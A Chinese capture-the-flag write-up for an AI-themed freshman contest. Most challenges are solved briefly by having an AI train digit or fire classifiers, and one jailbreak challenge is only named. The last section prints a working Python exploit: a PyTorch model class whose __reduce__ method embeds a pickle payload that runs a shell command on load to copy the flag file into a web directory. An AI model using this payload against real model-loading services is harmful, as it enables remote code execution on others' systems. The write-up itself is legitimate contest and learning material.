【AI】2025 0x401新生交流赛 wp

目录

许哥的数字游戏

🤫歌的😡🔥

[Aura JailBreak](#Aura JailBreak)

明阳未许

[🔥🌸 LittFlower: Fire Boom! 🌸🔥](#🔥🌸 LittFlower: Fire Boom! 🌸🔥)


许哥的数字游戏

就是用题目给的数据去训练个模型识别数字

先叫ai解读下附件内容

让ai根据数据集训练个模型

把题目交互方式告诉ai,写个解题脚本拿到flag

🤫歌的😡🔥

附件内容,一个是有火的图,一个是没火的图

还是让ai训练模型&写交互

拿到flag

Aura JailBreak

明阳未许

一样是ai秒了

🔥🌸 LittFlower: Fire Boom! 🌸🔥

复制代码
import torch
import torch.nn as nn
from torchvision import models
import builtins
import os

class MaliciousMobileNetV2(models.MobileNetV2):
    def __init__(self, num_classes=2):
        super().__init__(num_classes=num_classes)
        
    def __reduce__(self):
        
        state_dict = self.state_dict()

        fake_state_dict = state_dict.copy()
        
        if "classifier.1.weight" in fake_state_dict:
            del fake_state_dict["classifier.1.weight"]
        if "classifier.1.bias" in fake_state_dict:
            del fake_state_dict["classifier.1.bias"]
        cmd = "import os; os.system('cp /flag /app/static/flag.txt')"
        
        return (builtins.eval, (
            "(exec(cmd), state_dict)[1]", 
            {'cmd': cmd, 'state_dict': fake_state_dict}
        ))

if __name__ == '__main__':
    model = MaliciousMobileNetV2(num_classes=2)
    save_path = 'evil.pth'
    print(f"正在生成 Payload: {save_path} ...")
    torch.save(model, save_path)
    print("生成成功!")

上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag

相关推荐
感谢地心引力40 分钟前
在codex里面使用Deepseek-v4,支持mac和windows双系统
windows·gpt·macos·ai·codex·deepseek
搬砖的小码农_Sky1 小时前
AI Agent:macOS Sequoia 部署 OpenClaw 完整教程
人工智能·macos·ai·人机交互
无心水2 小时前
【Harness:设计规范】15、Harness 成熟度模型(H0-H3):你的 AI 智能体在第几层
人工智能·设计规范·openclaw·养龙虾·harness·hermes·honcho
Raink老师8 小时前
【AI面试临阵磨枪-79】实时数据 RAG:订单、商家、物流、天气、动态库存
人工智能·面试·职场和发展
脑极体8 小时前
点亮星河AI+鸿蒙,一座艺术场馆的日神觉醒
人工智能·华为·harmonyos
Cosolar8 小时前
Chroma向量库面试学习指南
数据库·人工智能·面试·职场和发展·数据库架构
BUG指挥官8 小时前
Claude Code的自动化编程
人工智能
笨蛋©8 小时前
2026年质量管理指南:泡泡图(Bubble Drawing)与自动化检验计划实战
ai·数字化·cad·质量管理·制造业
意图共鸣8 小时前
意图共鸣科技《认知智能白皮书》——感知与执行分离:认知架构(CA)如何重塑大模型底层结构
人工智能·架构
等一个人的@8 小时前
让数据自己开口:数睿通智库新增智能问数模块
人工智能·自然语言处理